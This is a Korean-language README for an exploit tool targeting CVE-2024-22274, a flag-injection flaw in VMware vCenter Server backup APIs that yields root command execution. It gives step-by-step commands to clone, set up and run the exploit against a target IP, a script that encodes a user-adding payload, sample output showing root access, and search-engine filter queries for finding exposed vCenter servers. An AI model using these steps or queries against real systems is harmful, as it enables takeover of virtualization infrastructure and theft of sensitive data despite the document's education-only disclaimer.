
PoC - VMware vCenter Server에서 인증된 원격 코드 실행 (Exploit)
"com.vmware.appliance.recovery.backup.job.create" 및 "com.vmware.appliance.recovery.backup.validate" API 구성 요소는 플래그 인젝션 공격에 취약하며, 이를 이용해 대상 시스템에서 root 사용자로 임의 명령어를 실행할 수 있습니다."
[!NOTE] 이 PoC 익스플로잇을 사용하려면 유효한 자격 증명이 있어야 하며 SSH를 통해 VMware vCenter Server 셸에 로그인해야 합니다. 사용자는
vcenter_creds.txt파일에 명시된 대로 "admin" 역할을 가져야 합니다.
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt
user2base64.sh를 실행하거나 수정하여 새 사용자를 base64로 인코딩하고 자동으로payload.txt를 생성합니다.
$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt


$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
uid=0(root) gid=0(root) groups=0(root)
[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103
이 예시는 연결은 되었으나 페이로드가 올바르게 구성되지 않았거나 로드되지 않은 경우입니다. 자세한 내용은 PDF PoC를 참조하세요.
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
No privileges escalation detected.
[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: Username or password not found in configuration file.
호스트 주소와 자격 증명을 확인하세요.
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.
"VMware vCenter", 필터: services.port: 443 AND tags: "VMware"title="VMware vCenter", 필터: port="443" && title="VMware vCenter""VMware vCenter", 필터: port:443 "VMware vCenter"이 PoC 익스플로잇은 스크립트를 해석하는 방법을 이해하지 못하면 효과적이지 않습니다. 의도적으로 "스크립트 키디"들이 이해 없이 단순히 복사하여 실행하는 것을 방지하기 위해 수정되었습니다. VMware vCenter Server는 가상화 환경 관리의 핵심 구성 요소이며, 누군가 이에 접근하면 가상 인프라에 대한 완전한 제어권을 얻고 민감한 데이터를 유출할 수 있습니다. 이 PoC는 올바르게 사용할 수 있는 작은 기술적 전문성을 가진 사람들을 위해 설계되었습니다. 따라서 영향을 이해하지 못하고 혼란을 일으키려는 스크립트 키디라면 이 익스플로잇은 유용하지 않을 것입니다.
이 도구는 교육 및 연구 목적으로만 제공됩니다. 제작자는 도구의 오용이나 손해에 대해 어떠한 책임도 지지 않습니다. 이슈 생성